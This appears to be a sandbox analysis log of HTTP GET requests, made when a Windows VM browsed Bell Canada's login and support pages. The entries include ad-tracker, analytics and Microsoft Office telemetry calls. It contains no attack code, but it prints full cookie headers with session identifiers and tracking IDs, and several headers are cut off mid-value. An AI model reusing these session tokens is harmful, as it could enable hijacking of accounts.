Source: global trafficHTTP traffic detected: GET /match/bounce/?bid=6j5b2cv&uid=26594250982175076714259318767746782479&r=https%3A%2F%2Fdpm.demdex.net%2Fibs%3Adpid%3D30064%26dpuuid%3D%7BUUID_6j5b2cv%7D HTTP/1.1Host: ps.eyeota.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: mako_uid=192e2b49ec2-389e0000010f5b1a; SERVERID=23322~DM
Source: global trafficHTTP traffic detected: GET /ups/58782/cms?partner_id=ADOBE&_hosted_id=26594250982175076714259318767746782479&gdpr=0&gdpr_consent= HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /supportrqcode HTTP/1.1Host: m.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; TLP025e8c23=028702b9c9718a69ccda5c161a00733ba6478f464a85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b95d928d2fe49eecf0285c093b48a7acad96a13a1e504a27fdb97ebf8496a63b9b; at_check=true; _s=S6c9HjLG1CKQ24ifOYUX5B5hCZzHCSe7lfumMUowKETY2281c4GOWO2X5PlM16AY; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; mbox=session#e8acc2285415480dbbf54ad6f854a96e#1730382191|PC#e8acc2285415480dbbf54ad6f854a96e.37_0#1793625131; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: mybell.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mybell.bell.ca/Login?language=enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; TLP025e8c23=028702b9c9718a69ccda5c161a00733ba6478f464a85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b95d928d2fe49eecf0285c093b48a7acad96a13a1e504a27fdb97ebf8496a63b9b; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; mbox=session#e8acc2285415480dbbf54ad6f854a96e#1730382191|PC#e8acc2285415480dbbf54ad6f854a96e.37_0#1793625131; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7
Source: global trafficHTTP traffic detected: GET /i/14028/ws/ HTTP/1.1Host: collection.decibelinsight.netConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://mybell.bell.caSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3Sec-WebSocket-Key: iI9ZChMSk/dPpfB4ZOehyg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ups/58782/cms?partner_id=ADOBE&_hosted_id=26594250982175076714259318767746782479&gdpr=0&gdpr_consent=&uid=26594250982175076714259318767746782479&verify=true HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBDeCI2cCEAGbOOt1bmVpcV5uO23se5IFEgEBAQHTJGctZ9xS0iMA_eMAAA&S=AQAAAkKiILS9FcpZ9MyrpSuDrUI
Source: global trafficHTTP traffic detected: GET /ibs:dpid=121998&dpuuid=154887fb7993fab4238c648c733996f4 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184|73426-1-1730380336920|121998-1-1730380337926|139200-1-1730380339124
Source: global trafficHTTP traffic detected: GET /ibs:dpid=30064&dpuuid=%7BUUID_6j5b2cv%7D HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184|73426-1-1730380336920|121998-1-1730380337926|139200-1-1730380339124
Source: global trafficHTTP traffic detected: GET /v1/pageview HTTP/1.1Host: api2.branch.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ibs:dpid=73426&dpuuid=26594250982175076714259318767746782479 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184|73426-1-1730380336920|121998-1-1730380337926|139200-1-1730380339124
Source: global trafficHTTP traffic detected: GET /wG8vjg7lLgb?_p=c11334dc9a0760eee0188ee3efb2 HTTP/1.1Host: bell.app.linkConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /wdccan/36793/onsite/embed.js HTTP/1.1Host: resources.digital-cloud.medallia.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ibs:dpid=30646?dpuuid=y-0lAI.WpE2pHUbvKJtuuYuEn5gUZrLYWmeXs-~A HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184|73426-1-1730380336920|121998-1-1730380337926|139200-1-1730380339124
Source: global trafficHTTP traffic detected: GET /Login?_branch_match_id=1380522052703713689&_branch_referrer=H4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%3D HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; TLP025e8c23=028702b9c9718a69ccda5c161a00733ba6478f464a85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b95d928d2fe49eecf0285c093b48a7acad96a13a1e504a27fdb97ebf8496a63b9b; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; mbox=session#e8acc2285415480dbbf54ad6f854a96e#1730382191|PC#e8acc2285415480dbbf54ad6f854a96e.37_0#1793625131; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a3
Source: global trafficHTTP traffic detected: GET /dcm?pid=5c420d2b-f139-4fee-b0c0-89a7b8ce9433 HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /m2/bellcanada/mbox/json?mbox=target-global-mbox&mboxSession=e8acc2285415480dbbf54ad6f854a96e&mboxPC=e8acc2285415480dbbf54ad6f854a96e.37_0&mboxPage=069d409e300449049cc9fb6d597b6dd1&mboxRid=5aab41e5dc814d24ac07652f52c146c2&mboxVersion=1.8.2&mboxCount=1&mboxTime=1730365944237&mboxHost=support.bell.ca&mboxURL=https%3A%2F%2Fsupport.bell.ca%2FBilling-and-Accounts%2Fmanage_your_bell_services_on_the_go%23EXT%3DMOB_URL_branch_getapploginpage_012423_MH&mboxReferrer=&browserHeight=907&browserWidth=1263&browserTimeOffset=-240&screenHeight=1024&screenWidth=1280&colorDepth=24&devicePixelRatio=1&screenOrientation=landscape&webGLRenderer=ANGLE%20%28Google%2C%20Vulkan%201.3.0%20%28SwiftShader%20Device%20%28Subzero%29%20%280x0000C0DE%29%29%2C%20SwiftShader%20driver%29&lob=&dflob=&language=en&province=on&footprint=&PostalCode=&LoggedInStatus=false&epp_company_code=dock%20is%20not%20present%3Ai&profile.IspCheckAvail=false&mboxMCSDID=072439601D5CACF0-7EA83BB21298A984&mboxMCGVID=26404690240998747124274156036452379072&mboxAAMB=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&mboxMCGLH=6 HTTP/1.1Host: somni.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://support.bell.caSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; 